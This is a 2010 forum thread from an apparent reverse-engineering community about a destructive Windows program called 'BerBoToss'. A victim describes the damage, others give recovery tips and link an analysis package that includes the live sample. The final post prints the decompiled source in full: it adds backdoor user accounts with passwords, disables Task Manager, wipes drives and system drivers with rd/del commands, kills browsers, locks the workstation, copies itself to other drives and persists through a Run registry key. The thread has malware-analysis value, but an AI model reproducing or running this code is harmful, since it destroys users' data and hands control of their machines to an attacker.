blackpirate Posted June 20, 2010 Posted June 20, 2010 hey, i just found a link to an aapp, lets say very handy to have!i thought that its too nice to be real so i scanned the file first on virustotal , and without any positive result!then the bad things happened:after running it..the app created multile user accounts, loked mine (admin), deleted restore point...very nasty!can someone debugg it? to see whats its all about and if i tooked any risk? i had some important things on my pc! (passwords etc)PLEASE BE CAREFULL! RUN IT ON VIRTUAL MACHINE ONLY!FILE:http://www.sendspace.com/file/w04db8thnx in advance!BP
Nacho_dj Posted June 20, 2010 Posted June 20, 2010 Hey blackpirate, your data shouldn't be lost. To get access to your data, use ERD Commander and you should be able to access any folder of your system.Good luckNacho_dj
blackpirate Posted June 20, 2010 Author Posted June 20, 2010 thnx Nacho! as we speak i try to get them with recover my files pro! since,.. donno , but 3 of my hdd partition were formatted ! and you right , from what i see untill now i can recover entire partition! but none from C: , cause i reinstalled win 7! btw: what the f#ck1n' app was that ? glad that didnt create lot of damage! thnx again! Regards! BP
STRELiTZIA Posted June 25, 2010 Posted June 25, 2010 Hi,It is a very basic malware with aggressive behavior, language: MS Visual Basic.NETI made a short analysis...Analysis package contains:1- Analysis paper (PDF) 2- Active malware, archive password : malware 3- IDA Pro database file (BerBoToss) for IDA PRO 5.5.0.925t (32bit)RegardsBerBoToss analysis.rar
JMC31337 Posted June 26, 2010 Posted June 26, 2010 (edited) Hi,It is a very basic malware with aggressive behavior, language: MS Visual Basic.NETI made a short analysis...Analysis package contains:1- Analysis paper (PDF) 2- Active malware, archive password : malware 3- IDA Pro database file (BerBoToss) for IDA PRO 5.5.0.925t (32bit)RegardsSTREL steppin up to the plate... Nice way to make an entrance... Edited June 26, 2010 by JMC31337
JesusSpork Posted August 19, 2010 Posted August 19, 2010 (edited) May be a bit late in with this post, but the program isn't obfuscated Courtesy of .Net Reflector: internal sealed class Module1{ // Methods public static void DisableTaskMgr(bool Enable) { switch (Enable) { case false: MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "0", RegistryValueKind.DWord); break; case true: MyProject.Computer.Registry.SetValue(@"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableTaskMgr", "1", RegistryValueKind.DWord); break; } } [STAThread] public static void Main() { MyProject.Computer.FileSystem.WriteAllText(@"C:\wmnpdmod.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false); foreach (Process process in Process.GetProcessesByName("firefox")) { process.Kill(); } foreach (Process process2 in Process.GetProcessesByName("IEXPLORE")) { process2.Kill(); } foreach (Process process3 in Process.GetProcessesByName("notepad")) { process3.Kill(); } Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\BerBoToss.exe", AppWinStyle.Hide, true, -1); Interaction.Shell(@"cmd /c BerBoToss >nul >C:\WINDOWS\system32\wmp.dll", AppWinStyle.Hide, true, -1); Interaction.Shell("net user Administrateur /add", AppWinStyle.MinimizedFocus, false, -1); Interaction.Shell(@"cmd /c copy BerBoToss.exe C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1); Interaction.Shell("net user Fes_L39_Berbotoss /add", AppWinStyle.MinimizedFocus, false, -1); DisableTaskMgr(true); Interaction.Shell("net user 3an9oud-La3jeb /add", AppWinStyle.MinimizedFocus, false, -1); MyProject.Computer.FileSystem.WriteAllText(@"C:\msimg32.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false); Interaction.Shell("net user Berbotoss_L39 /add", AppWinStyle.MinimizedFocus, false, -1); Interaction.Shell("net user Fes_L39_Berbotoss 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1); Interaction.Shell("net user 3an9oud-La3jeb 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1); Interaction.Shell("net user Administrateur 1marocberbotossfes", AppWinStyle.MinimizedFocus, false, -1); Interaction.Shell("label c: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1); Interaction.Shell("label d: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1); Interaction.Shell("label e: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1); Interaction.Shell("label f: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1); Interaction.Shell("label g: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1); Interaction.Shell("label h: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1); Interaction.Shell("label l: 3an9oud-La3jeb", AppWinStyle.Hide, false, -1); Interaction.Shell("net user Berbotoss_L39 1MarocBerbotossFes", AppWinStyle.MinimizedFocus, false, -1); Interaction.Shell("cmd /c NET SESSION * /del", AppWinStyle.Hide, false, -1); Interaction.Shell("cmd /c NET SESSION \\poste_connect\x00e9 /del", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c rd d:\ /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c rd e:\ /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c rd f:\ /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c rd g:\ /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c del C:\*.mp3 /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c del C:\*.jpg /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c del C:\*.zip /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c del C:\*.rar /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c rd C:\WINDOWS\system32\drivers /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c del C:\*.lnk /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c del C:\*.3gp /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c del C:\*.lrc /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell("cmd /c Time 11:11.00", AppWinStyle.Hide, false, -1); Interaction.Shell("cmd /c date 01/1/1987", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c echo BerBoToss v1.0 > nul > C:\WINDOWS\system32\obj\Release\BerBoToss.pdb", AppWinStyle.Hide, false, -1); Interaction.Shell("cmd /c rundll32.exe user32.dll,LockWorkStation", AppWinStyle.Hide, true, -1); Process.Start("http://fassifasso.tripod.com/45313165.54436536543512155450/BerBoToss/index.html"); Interaction.Shell(@"cmd /c del C:\*.html /s/q", AppWinStyle.Hide, false, -1); Interaction.Shell(@"cmd /c copy BerBoToss.exe E:\BerBoToss.exe", AppWinStyle.Hide, true, -1); Interaction.Shell(@"cmd /c copy BerBoToss.exe F:\BerBoToss.exe", AppWinStyle.Hide, true, -1); Interaction.Shell(@"cmd /c copy BerBoToss.exe D:\BerBoToss.exe", AppWinStyle.Hide, true, -1); Interaction.Shell(@"cmd /c copy BerBoToss.exe g:\BerBoToss.exe", AppWinStyle.Hide, true, -1); Interaction.Shell(@"cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v BerBoToss /t REG_SZ /d C:\WINDOWS\BerBoToss.exe", AppWinStyle.Hide, true, -1); MyProject.Computer.Clipboard.SetText("BerBoToss V1.0"); Interaction.Shell(@"cmd /c BerBoToss >nul >C:\WINDOWS\system32\xpsp2res.dll", AppWinStyle.Hide, true, -1); foreach (Process process4 in Process.GetProcessesByName("msnmsgr")) { process4.Kill(); } MyProject.Computer.FileSystem.WriteAllText(@"C:\kbdhe340.dll", "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss", false); object obj2 = Interaction.MsgBox("BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum \x00b0+... Daba AdiosS Amigoss", MsgBoxStyle.Information, "Maroc Fes Erreur HTTA 39 - Mardankore.dll ... & "); }} Edited August 19, 2010 by JesusSpork
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now